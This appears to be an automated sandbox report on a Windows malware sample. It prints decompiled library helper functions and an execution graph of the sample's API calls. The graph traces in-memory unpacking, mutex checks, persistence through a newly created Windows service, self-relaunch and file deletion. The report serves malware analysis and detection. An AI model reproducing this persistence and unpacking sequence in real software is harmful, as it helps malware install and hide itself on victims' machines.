                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                              • String ID:
                                                                              • API String ID: 2949335588-0
                                                                              • Opcode ID: 81c19ecc51828a1e5e79cebcbc900f0999c89da0af03d31b34ee2f1d8a77597b
                                                                              • Instruction ID: eb59b6a1cc8b1e2b734c79961075657494e3cade5e43254114fc2358f7367c79
                                                                              • Opcode Fuzzy Hash: 81c19ecc51828a1e5e79cebcbc900f0999c89da0af03d31b34ee2f1d8a77597b
                                                                              • Instruction Fuzzy Hash: 52115B31A00614EFD724CF58EA84F5AB7B4FF05355F61842EF543876A1CBB5A940CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00414D1F, Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00414D1F() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x45bc2c; // 0x0
				_t26 =  *0x45bc3c; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x45bc30; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x45bc44, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x45bc2c =  *0x45bc2c + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x45bc44, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x45bc44, 0,  *0x45bc30, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x45bc3c =  *0x45bc3c + 0x10;
						 *0x45bc30 = _t24;
						_t15 =  *0x45bc2c; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}











                                                                              0x00414d1f
                                                                              0x00414d24
                                                                              0x00414d2f
                                                                              0x00414d65
                                                                              0x00414d65
                                                                              0x00414d7c
                                                                              0x00414d7f
                                                                              0x00414d87
                                                                              0x00414d8a
                                                                              0x00414d9d
                                                                              0x00414da5
                                                                              0x00414da8
                                                                              0x00414dbc
                                                                              0x00414dc0
                                                                              0x00414dc2
                                                                              0x00414dc5
                                                                              0x00414dce
                                                                              0x00414dd1
                                                                              0x00414daa
                                                                              0x00414db4
                                                                              0x00000000
                                                                              0x00414db4
                                                                              0x00414d8c
                                                                              0x00414d8c
                                                                              0x00414d8c
                                                                              0x00414d8c
                                                                              0x00414dd5
                                                                              0x00414d31
                                                                              0x00414d31
                                                                              0x00414d46
                                                                              0x00414d4e
                                                                              0x00414d54
                                                                              0x00414d5b
                                                                              0x00414d60
                                                                              0x00000000
                                                                              0x00414d50
                                                                              0x00414d53
                                                                              0x00414d53
                                                                              0x00414d4e

                                                                              APIs
                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00415310,00000000,?,00000000), ref: 00414D46
                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415310,00000000,?,00000000), ref: 00414D7F
                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00414D9D
                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00414DB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocHeap$FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 3499195154-0
                                                                              • Opcode ID: 76ddc87352e501aeb7364d1561ba76e65eed77cc71c6fbf8ee09cdf843c50fcd
                                                                              • Instruction ID: cd962d8c170feacae1faba079cd58df97f3eec983c759013e3692b5aa082956c
                                                                              • Opcode Fuzzy Hash: 76ddc87352e501aeb7364d1561ba76e65eed77cc71c6fbf8ee09cdf843c50fcd
                                                                              • Instruction Fuzzy Hash: 721137302003059FCB328F29FD45A66BBB5FB84712760492EF592C62A1DF709842CF4C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E21A, Relevance: 5.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042E21A(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x45a308 == 0) {
					E0042E1B1();
				}
				_t21 = _a4;
				_t24 = 0x45a110 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x45a154);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x45a170 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x45a154);
				}
				_t13 = 0x45a170 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}






                                                                              0x0042e221
                                                                              0x0042e223
                                                                              0x0042e223
                                                                              0x0042e231
                                                                              0x0042e235
                                                                              0x0042e23f
                                                                              0x0042e248
                                                                              0x0042e24d
                                                                              0x0042e25a
                                                                              0x0042e260
                                                                              0x0042e260
                                                                              0x0042e263
                                                                              0x0042e269
                                                                              0x0042e26d
                                                                              0x0042e275
                                                                              0x0042e27a

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0045A154,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E248
                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E25A
                                                                              • LeaveCriticalSection.KERNEL32(0045A154,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E263
                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4,004239CA), ref: 0042E275
                                                                                • Part of subcall function 0042E1B1: InitializeCriticalSection.KERNEL32(0045A154,0042E228,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4,004239CA,0042A1C0,74B04DE0), ref: 0042E1C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterInitialize$Leave
                                                                              • String ID:
                                                                              • API String ID: 713024617-0
                                                                              • Opcode ID: 154627d0f44fbb6f2967661d46d046f1f0d3a6218a6440111358211ba1d8111f
                                                                              • Instruction ID: b5c77500dba09fe0653f4fe42e4c4ada43285f6bba364d30f6cad982437c146d
                                                                              • Opcode Fuzzy Hash: 154627d0f44fbb6f2967661d46d046f1f0d3a6218a6440111358211ba1d8111f
                                                                              • Instruction Fuzzy Hash: 63F0903150031ADFDB109F95FC84B56B7ACFB5431AF401537E60683012DB38E565CAAD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Analysis Process: lK8vF3n2e7.exe PID: 4144 Parent PID: 460 lK8vF3n2e7.exeCOMMON

                                                                              Execution Graph

                                                                              Execution Coverage:6.6%
                                                                              Dynamic/Decrypted Code Coverage:10.7%
                                                                              Signature Coverage:1.7%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:62

                                                                              Graph

                                                                              execution_graph 31948 428bcb 8 API calls 31949 42c5e9 31950 42c5f7 31949->31950 31953 42c51f 31950->31953 31951 42c624 31954 42c553 31953->31954 31955 42c5db RegCloseKey 31953->31955 31956 42c554 RegOpenKeyExA 31954->31956 31957 42c5c3 RegCloseKey 31954->31957 31959 42c571 RegQueryValueExA 31954->31959 31955->31951 31956->31954 31956->31957 31957->31956 31958 42c5da 31957->31958 31958->31955 31959->31954 31960 416eba SetUnhandledExceptionFilter 31961 21e0000 31963 21e0005 31961->31963 31966 21e002d 31963->31966 31986 21e0467 GetPEB 31966->31986 31968 21e0045 31969 21e0467 GetPEB 31968->31969 31970 21e0053 31969->31970 31971 21e0467 GetPEB 31970->31971 31972 21e0061 31971->31972 31973 21e0467 GetPEB 31972->31973 31974 21e006d 31973->31974 31975 21e0467 GetPEB 31974->31975 31976 21e007b 31975->31976 31977 21e0467 GetPEB 31976->31977 31979 21e0089 31977->31979 31978 21e00e6 GetNativeSystemInfo 31980 21e0109 VirtualAlloc 31978->31980 31984 21e0029 31978->31984 31979->31978 31979->31984 31983 21e0135 31980->31983 31981 21e03c3 31988 222da0a 31981->31988 31982 21e0384 VirtualProtect 31982->31983 31982->31984 31983->31981 31983->31982 31987 21e0483 31986->31987 31987->31968 31987->31987 32006 222bf42 31988->32006 31990 222da1b 32009 222cb34 31990->32009 31992 222da20 GetModuleFileNameW 31993 222da40 31992->31993 32012 2221a52 31993->32012 31995 222da51 _snwprintf 31996 2221b09 31995->31996 31997 222da6d GetCommandLineW lstrlenW lstrlenW 31996->31997 32001 222dab1 31997->32001 31998 222da92 lstrcmpiW 31998->32001 32002 222daa4 31998->32002 31999 222dab8 32026 2221cc2 memset CreateProcessW CloseHandle CloseHandle 31999->32026 32001->31998 32001->31999 32016 222bcc2 GetTickCount 32002->32016 32003 222dace ExitProcess 32027 22212cd GetPEB 32006->32027 32008 222cb20 32008->31990 32010 222d9f6 32009->32010 32011 22212cd GetPEB 32009->32011 32010->31992 32011->32010 32013 2221a70 32012->32013 32029 22214f2 GetProcessHeap RtlAllocateHeap 32013->32029 32015 2221a84 32015->31995 32015->32015 32030 222b901 GetWindowsDirectoryW 32016->32030 32021 222bd19 ExitProcess 32022 222bce9 WaitForSingleObject 32023 222bd03 32022->32023 32023->32021 32048 222bc00 32023->32048 32025 222bd08 WaitForSingleObject 32025->32023 32026->32003 32028 22212e2 32027->32028 32028->32008 32029->32015 32031 222b95f 32030->32031 32033 222b920 GetVolumeInformationW 32030->32033 32034 222ba6f 32031->32034 32033->32031 32077 222b963 32034->32077 32036 222ba77 32037 222ba7b WaitForSingleObject 32036->32037 32038 222baeb 32036->32038 32039 222ba92 32037->32039 32038->32021 32038->32022 32039->32038 32082 222b9bc 32039->32082 32041 222ba9b 32042 222bad3 ReleaseMutex CloseHandle 32041->32042 32087 222ba15 GetProcessHeap RtlAllocateHeap _snwprintf CreateEventW 32041->32087 32042->32038 32044 222baa4 32044->32042 32045 222baa8 SignalObjectAndWait 32044->32045 32046 222bac1 32045->32046 32047 222bac5 ResetEvent 32045->32047 32046->32042 32046->32047 32047->32042 32049 222bc80 32048->32049 32050 222bc0b 32048->32050 32116 22262bc GetProcessHeap RtlAllocateHeap LoadLibraryW 32049->32116 32052 222bc3a 32050->32052 32053 222bc0e 32050->32053 32110 2228bac GetProcessHeap RtlAllocateHeap LoadLibraryW 32052->32110 32056 222bc11 32053->32056 32057 222bc29 32053->32057 32055 222bc85 32117 2227842 GetProcessHeap RtlAllocateHeap LoadLibraryW 32055->32117 32060 222bc18 SetEvent 32056->32060 32061 222bcb4 32056->32061 32109 222baf0 82 API calls 32057->32109 32058 222bc3f 32111 22298ae GetProcessHeap RtlAllocateHeap LoadLibraryW 32058->32111 32060->32061 32061->32025 32064 222bc8a 32088 222e2c5 32064->32088 32065 222bc38 32065->32025 32066 222bc44 32112 222abaa GetProcessHeap RtlAllocateHeap LoadLibraryW 32066->32112 32069 222bc49 32113 222ac8a GetProcessHeap RtlAllocateHeap LoadLibraryW 32069->32113 32071 222bc9d GetTickCount 32071->32025 32072 222bc4e 32114 222b81a GetProcessHeap RtlAllocateHeap LoadLibraryW 32072->32114 32074 222bc53 32115 2226057 10 API calls 32074->32115 32076 222bc5a 32076->32061 32076->32071 32078 2221a52 2 API calls 32077->32078 32079 222b97c _snwprintf 32078->32079 32080 2221b09 32079->32080 32081 222b99b CreateMutexW 32080->32081 32081->32036 32083 2221a52 2 API calls 32082->32083 32084 222b9d5 _snwprintf 32083->32084 32085 2221b09 32084->32085 32086 222b9f4 CreateMutexW 32085->32086 32086->32041 32087->32044 32118 222db03 OpenSCManagerW 32088->32118 32092 222e2da 32124 222dd5d CreateFileW 32092->32124 32096 222e2ee 32139 222dc86 32096->32139 32098 222e2f3 lstrcmpiW 32099 222e30a 32098->32099 32100 222e308 32098->32100 32153 222dfd2 32099->32153 32100->32076 32103 222e318 32168 222e138 OpenSCManagerW 32103->32168 32104 222e31f 32186 2221cc2 memset CreateProcessW CloseHandle CloseHandle 32104->32186 32107 222e31d 32107->32076 32108 222e32b 32108->32107 32109->32065 32110->32058 32111->32066 32112->32069 32113->32072 32114->32074 32115->32076 32116->32055 32117->32064 32119 222db16 CloseServiceHandle 32118->32119 32120 222db27 32118->32120 32119->32120 32121 222dae1 32120->32121 32187 2221503 32121->32187 32125 222ddd3 32124->32125 32126 222dd7f CreateFileMappingW 32124->32126 32131 222ddd6 GetComputerNameW 32125->32131 32127 222dd93 MapViewOfFile 32126->32127 32128 222ddcb CloseHandle 32126->32128 32129 222ddc4 FindCloseChangeNotification 32127->32129 32130 222dda5 GetFileSize RtlComputeCrc32 UnmapViewOfFile 32127->32130 32128->32125 32129->32128 32130->32129 32132 222de2d 32131->32132 32133 222ddf6 32131->32133 32191 22219ab 32132->32191 32134 22219ab 2 API calls 32133->32134 32136 222de01 WideCharToMultiByte 32134->32136 32136->32132 32137 222de70 _snprintf 32138 222de97 32137->32138 32138->32096 32140 2221a52 2 API calls 32139->32140 32141 222dca3 32140->32141 32196 222db28 lstrlenW 32141->32196 32143 222dcb2 32144 222dcd1 SHGetFolderPathW 32143->32144 32145 222dcdc SHGetFolderPathW 32143->32145 32147 222dd14 32144->32147 32146 2221a52 2 API calls 32145->32146 32148 222dcf1 _snwprintf 32146->32148 32149 2221a52 2 API calls 32147->32149 32148->32147 32150 222dd20 _snwprintf 32149->32150 32151 2221b09 32150->32151 32152 222dd49 DeleteFileW 32151->32152 32152->32098 32198 2221000 32153->32198 32158 222e05b 32207 22210dc 32158->32207 32160 2221503 memset 32161 222e00c GetTempPathW GetTempFileNameW 32160->32161 32163 222108b 2 API calls 32161->32163 32162 222e060 32162->32103 32162->32104 32164 222e037 32163->32164 32164->32158 32165 222108b 2 API calls 32164->32165 32166 222e048 32165->32166 32166->32158 32167 222108b 2 API calls 32166->32167 32167->32158 32169 222e213 32168->32169 32170 222e15f 32168->32170 32169->32107 32171 2221a52 2 API calls 32170->32171 32172 222e16f _snwprintf 32171->32172 32173 2221b09 32172->32173 32174 222e193 CreateServiceW 32173->32174 32175 222e1ba OpenServiceW 32174->32175 32176 222e1cc 32174->32176 32177 222e1ee 32175->32177 32212 222de9c EnumServicesStatusExW 32176->32212 32180 222e1f2 StartServiceW CloseServiceHandle 32177->32180 32181 222e204 32177->32181 32180->32181 32231 222e068 GetModuleFileNameW lstrlenW OpenServiceW DeleteService CloseServiceHandle 32181->32231 32182 222e1da ChangeServiceConfig2W 32230 2221532 GetProcessHeap HeapFree 32182->32230 32185 222e20b CloseServiceHandle 32185->32169 32186->32108 32190 222150b memset 32187->32190 32189 2221509 GetModuleFileNameW 32189->32092 32190->32189 32192 22219cb 32191->32192 32195 22214f2 GetProcessHeap RtlAllocateHeap 32192->32195 32194 22219de 32194->32137 32194->32194 32195->32194 32197 222db4c 32196->32197 32197->32143 32199 2221503 memset 32198->32199 32203 222101b 32199->32203 32200 2221071 32205 222108b memset SHFileOperationW 32200->32205 32201 2221040 GetFileAttributesW 32202 2221052 CreateDirectoryW 32201->32202 32201->32203 32202->32203 32204 2221064 GetLastError 32202->32204 32203->32200 32203->32201 32204->32200 32204->32203 32206 22210cc 32205->32206 32206->32158 32206->32160 32208 2221a52 2 API calls 32207->32208 32209 22210f5 _snwprintf 32208->32209 32210 2221b09 32209->32210 32211 2221119 DeleteFileW 32210->32211 32211->32162 32213 222ded0 GetLastError 32212->32213 32223 222dfc0 32212->32223 32214 222dee1 32213->32214 32213->32223 32232 22214f2 GetProcessHeap RtlAllocateHeap 32214->32232 32216 222deea 32217 222def7 EnumServicesStatusExW 32216->32217 32216->32223 32218 222df1b GetTickCount 32217->32218 32222 222dfb3 32217->32222 32228 222df3a 32218->32228 32220 222df3e OpenServiceW 32221 222df52 QueryServiceConfig2W 32220->32221 32220->32228 32224 222dfa0 CloseServiceHandle 32221->32224 32225 222df67 GetLastError 32221->32225 32235 2221532 GetProcessHeap HeapFree 32222->32235 32223->32177 32223->32182 32224->32228 32225->32224 32225->32228 32227 222df80 QueryServiceConfig2W 32227->32224 32227->32228 32228->32220 32228->32222 32228->32224 32228->32227 32233 22214f2 GetProcessHeap RtlAllocateHeap 32228->32233 32234 2221532 GetProcessHeap HeapFree 32228->32234 32230->32177 32231->32185 32232->32216 32233->32228 32234->32224 32235->32223 32236 222dbac SHGetFolderPathW 32237 412d5e 32238 412d6a _fast_error_exit std::_Locinfo::_Getctype 32237->32238 32239 412d76 GetVersionExA 32238->32239 32240 412db2 32239->32240 32241 412dbe GetModuleHandleA 32239->32241 32240->32241 32242 412dda 32241->32242 32289 414943 HeapCreate 32242->32289 32244 412e2c 32245 412e38 32244->32245 32314 412d3a 36 API calls _fast_error_exit 32244->32314 32315 41640c 45 API calls _TranslateName 32245->32315 32248 412e3e 32249 412e42 32248->32249 32250 412e4a 32248->32250 32316 412d3a 36 API calls _fast_error_exit 32249->32316 32297 4178f9 41 API calls 2 library calls 32250->32297 32252 412e49 32252->32250 32254 412e57 32255 412e63 GetCommandLineA 32254->32255 32256 412e5b 32254->32256 32298 4177d7 44 API calls 3 library calls 32255->32298 32317 412d15 36 API calls _fast_error_exit 32256->32317 32259 412e62 32259->32255 32260 412e73 32318 417735 66 API calls 2 library calls 32260->32318 32262 412e7d 32263 412e81 32262->32263 32264 412e89 32262->32264 32319 412d15 36 API calls _fast_error_exit 32263->32319 32299 417502 65 API calls 5 library calls 32264->32299 32267 412e8e 32269 412e92 32267->32269 32270 412e9a 32267->32270 32268 412e88 32268->32264 32320 412d15 36 API calls _fast_error_exit 32269->32320 32300 413057 40 API calls 32270->32300 32273 412e99 32273->32270 32274 412ea1 32275 412eb0 GetStartupInfoA 32274->32275 32276 412ea9 32274->32276 32301 4174a5 65 API calls 2 library calls 32275->32301 32321 412d15 36 API calls _fast_error_exit 32276->32321 32279 412eaf 32279->32275 32280 412ec2 32281 412ecb 32280->32281 32282 412ed4 GetModuleHandleA 32281->32282 32302 4224cb 32282->32302 32285 412ef2 32323 4131a6 36 API calls _fast_error_exit 32285->32323 32288 412ef7 std::_Locinfo::_Getctype 32290 414963 32289->32290 32291 41498d 32289->32291 32292 414990 32290->32292 32293 414972 32290->32293 32291->32244 32292->32244 32324 414994 HeapAlloc 32293->32324 32295 41497c 32295->32292 32296 414981 HeapDestroy 32295->32296 32296->32291 32297->32254 32298->32260 32299->32267 32300->32274 32301->32280 32303 42a1b5 32302->32303 32325 4239c5 32303->32325 32311 412ee2 32311->32285 32322 413184 36 API calls _fast_error_exit 32311->32322 32312 42a1fc 32364 43030d 69 API calls ctype 32312->32364 32314->32245 32315->32248 32316->32252 32317->32259 32318->32262 32319->32268 32320->32273 32321->32279 32322->32285 32323->32288 32324->32295 32365 42d19f 32325->32365 32328 42d179 32329 42e088 ctype 24 API calls 32328->32329 32330 42d188 32329->32330 32331 42a1c7 32330->32331 32400 42dcf8 6 API calls 2 library calls 32330->32400 32333 42e5ce SetErrorMode SetErrorMode 32331->32333 32334 42d179 ctype 30 API calls 32333->32334 32335 42e5e6 32334->32335 32336 42d179 ctype 30 API calls 32335->32336 32337 42e5f5 32336->32337 32338 42e614 32337->32338 32401 42e480 32337->32401 32340 42d179 ctype 30 API calls 32338->32340 32341 42e619 32340->32341 32342 42e625 GetModuleHandleA 32341->32342 32429 423e66 32341->32429 32344 42e634 GetProcAddress 32342->32344 32345 42a1df 32342->32345 32344->32345 32345->32312 32346 405f9a 32345->32346 32347 405fa4 __EH_prolog 32346->32347 32448 40180a GetModuleHandleW GetProcAddress 32347->32448 32349 40600a 33208 408aaa 30 API calls ctype 32349->33208 32351 405fb3 _strlen 32351->32349 32450 401784 32351->32450 32352 406011 33209 407d75 67 API calls 2 library calls 32352->33209 32355 405fda 32455 403c31 32355->32455 32356 40601e 33210 424be6 146 API calls 2 library calls 32356->33210 32359 406035 32360 406043 32359->32360 32361 40603a SetFileSecurityW 32359->32361 33211 401bce 67 API calls 2 library calls 32360->33211 32361->32360 32363 406052 32363->32312 32364->32311 32366 42d179 ctype 30 API calls 32365->32366 32367 42d1a4 32366->32367 32370 42e088 32367->32370 32372 42e092 __EH_prolog 32370->32372 32371 42e0c8 32394 42dc98 EnterCriticalSection 32371->32394 32372->32371 32373 42e0b7 32372->32373 32381 42ddd3 TlsAlloc 32372->32381 32384 42db8c EnterCriticalSection 32373->32384 32377 42e0d7 32378 4239ca 32377->32378 32379 42e0dd 32377->32379 32378->32328 32399 42de78 9 API calls ctype 32379->32399 32382 42de02 32381->32382 32383 42de07 InitializeCriticalSection 32381->32383 32382->32383 32383->32373 32389 42dbad 32384->32389 32385 42dc62 ctype 32386 42dc79 LeaveCriticalSection 32385->32386 32386->32371 32387 42dbf6 GlobalHandle GlobalUnlock GlobalReAlloc 32390 42dc1b 32387->32390 32388 42dbe6 GlobalAlloc 32388->32390 32389->32385 32389->32387 32389->32388 32391 42dc42 GlobalLock 32390->32391 32392 42dc26 GlobalHandle GlobalLock 32390->32392 32393 42dc34 LeaveCriticalSection 32390->32393 32391->32385 32392->32393 32393->32391 32395 42dcaf 32394->32395 32396 42dcc0 LeaveCriticalSection 32394->32396 32395->32396 32397 42dcb4 TlsGetValue 32395->32397 32396->32377 32397->32396 32399->32378 32400->32331 32402 42d179 ctype 30 API calls 32401->32402 32403 42e4a3 GetModuleFileNameA 32402->32403 32404 42e4cb 32403->32404 32405 42e4d4 PathFindExtensionA 32404->32405 32435 42a382 RaiseException ctype 32404->32435 32407 42e4e8 32405->32407 32408 42e4ed 32405->32408 32436 42a382 RaiseException ctype 32407->32436 32437 42e451 PathFindFileNameA lstrlenA lstrcpynA 32408->32437 32411 42e507 32412 42e510 32411->32412 32438 42a382 RaiseException ctype 32411->32438 32417 42e523 32412->32417 32439 4131c4 36 API calls 3 library calls 32412->32439 32416 42e591 32419 42e596 lstrcatA 32416->32419 32420 42e5b4 32416->32420 32428 42e551 32417->32428 32440 428c25 35 API calls ctype 32417->32440 32418 42e53f 32441 4131c4 36 API calls 3 library calls 32418->32441 32443 4131c4 36 API calls 3 library calls 32419->32443 32444 412f8a 36 API calls 2 library calls 32420->32444 32423 42e572 lstrcpyA 32442 4131c4 36 API calls 3 library calls 32423->32442 32424 42e5c6 32424->32338 32427 42e587 32427->32416 32428->32416 32428->32423 32430 42d179 ctype 30 API calls 32429->32430 32431 423e6b 32430->32431 32432 423e93 32431->32432 32445 42d169 32431->32445 32432->32342 32437->32411 32439->32417 32440->32418 32441->32428 32442->32427 32443->32420 32444->32424 32446 42e088 ctype 24 API calls 32445->32446 32447 423e77 GetCurrentThreadId SetWindowsHookExA 32446->32447 32447->32432 32449 401839 32448->32449 32449->32351 32451 401796 LoadLibraryW GetProcAddress 32450->32451 32453 401792 ctype 32450->32453 32452 4017c2 32451->32452 32452->32453 33212 412247 32452->33212 32453->32355 32456 403c3b __EH_prolog 32455->32456 33232 401d2e 32456->33232 32461 403c78 std::runtime_error::~runtime_error 33249 403ba9 32461->33249 32465 403c9a 33261 401fb3 32465->33261 32467 403caf 32468 403cbf std::runtime_error::~runtime_error 32467->32468 32469 403be3 37 API calls 32468->32469 32470 403cd1 32469->32470 32471 401fb3 ctype 37 API calls 32470->32471 32472 403ce3 32471->32472 32473 403cf0 std::runtime_error::~runtime_error 32472->32473 32474 403be3 37 API calls 32473->32474 32475 403d02 32474->32475 32476 401fb3 ctype 37 API calls 32475->32476 32477 403d14 32476->32477 32478 403d21 std::runtime_error::~runtime_error 32477->32478 32479 403be3 37 API calls 32478->32479 32480 403d33 32479->32480 32481 401fb3 ctype 37 API calls 32480->32481 32482 403d45 32481->32482 32483 403d52 std::runtime_error::~runtime_error 32482->32483 32484 403be3 37 API calls 32483->32484 32485 403d64 32484->32485 32486 401fb3 ctype 37 API calls 32485->32486 32487 403d76 32486->32487 32488 403d83 std::runtime_error::~runtime_error 32487->32488 32489 403be3 37 API calls 32488->32489 32490 403d95 32489->32490 32491 401fb3 ctype 37 API calls 32490->32491 32492 403da7 32491->32492 32493 403db4 std::runtime_error::~runtime_error 32492->32493 32494 403be3 37 API calls 32493->32494 32495 403dc6 32494->32495 32496 401fb3 ctype 37 API calls 32495->32496 32497 403dd8 32496->32497 32498 403de5 std::runtime_error::~runtime_error 32497->32498 32499 403be3 37 API calls 32498->32499 32500 403df7 32499->32500 32501 401fb3 ctype 37 API calls 32500->32501 32502 403e09 32501->32502 32503 403e16 std::runtime_error::~runtime_error 32502->32503 32504 403be3 37 API calls 32503->32504 32505 403e28 32504->32505 32506 401fb3 ctype 37 API calls 32505->32506 32507 403e3a 32506->32507 32508 403e47 std::runtime_error::~runtime_error 32507->32508 32509 403be3 37 API calls 32508->32509 32510 403e59 32509->32510 32511 401fb3 ctype 37 API calls 32510->32511 32512 403e6b 32511->32512 32513 403e78 std::runtime_error::~runtime_error 32512->32513 32514 403be3 37 API calls 32513->32514 32515 403e8a 32514->32515 32516 401fb3 ctype 37 API calls 32515->32516 32517 403e9c 32516->32517 32518 403ea9 std::runtime_error::~runtime_error 32517->32518 32519 403be3 37 API calls 32518->32519 32520 403ebb 32519->32520 32521 401fb3 ctype 37 API calls 32520->32521 32522 403ecd 32521->32522 32523 403eda std::runtime_error::~runtime_error 32522->32523 32524 403be3 37 API calls 32523->32524 32525 403eec 32524->32525 32526 401fb3 ctype 37 API calls 32525->32526 32527 403efe 32526->32527 32528 403f0b std::runtime_error::~runtime_error 32527->32528 32529 403be3 37 API calls 32528->32529 32530 403f1d 32529->32530 32531 401fb3 ctype 37 API calls 32530->32531 32532 403f2f 32531->32532 32533 403f3c std::runtime_error::~runtime_error 32532->32533 32534 403be3 37 API calls 32533->32534 32535 403f4e 32534->32535 32536 401fb3 ctype 37 API calls 32535->32536 32537 403f60 std::runtime_error::~runtime_error 32536->32537 32538 403be3 37 API calls 32537->32538 32539 403f7f 32538->32539 32540 401fb3 ctype 37 API calls 32539->32540 32541 403f91 std::runtime_error::~runtime_error 32540->32541 32542 403be3 37 API calls 32541->32542 32543 403fb0 32542->32543 32544 401fb3 ctype 37 API calls 32543->32544 32545 403fc2 std::runtime_error::~runtime_error 32544->32545 32546 403be3 37 API calls 32545->32546 32547 403fe1 32546->32547 32548 401fb3 ctype 37 API calls 32547->32548 32549 403ff3 std::runtime_error::~runtime_error 32548->32549 32550 403be3 37 API calls 32549->32550 32551 404012 32550->32551 32552 401fb3 ctype 37 API calls 32551->32552 32553 404024 std::runtime_error::~runtime_error 32552->32553 32554 403be3 37 API calls 32553->32554 32555 404043 32554->32555 32556 401fb3 ctype 37 API calls 32555->32556 32557 404055 std::runtime_error::~runtime_error 32556->32557 32558 403be3 37 API calls 32557->32558 32559 404074 32558->32559 32560 401fb3 ctype 37 API calls 32559->32560 32561 404086 std::runtime_error::~runtime_error 32560->32561 32562 403be3 37 API calls 32561->32562 32563 4040a5 32562->32563 32564 401fb3 ctype 37 API calls 32563->32564 32565 4040b7 std::runtime_error::~runtime_error 32564->32565 32566 403be3 37 API calls 32565->32566 32567 4040d6 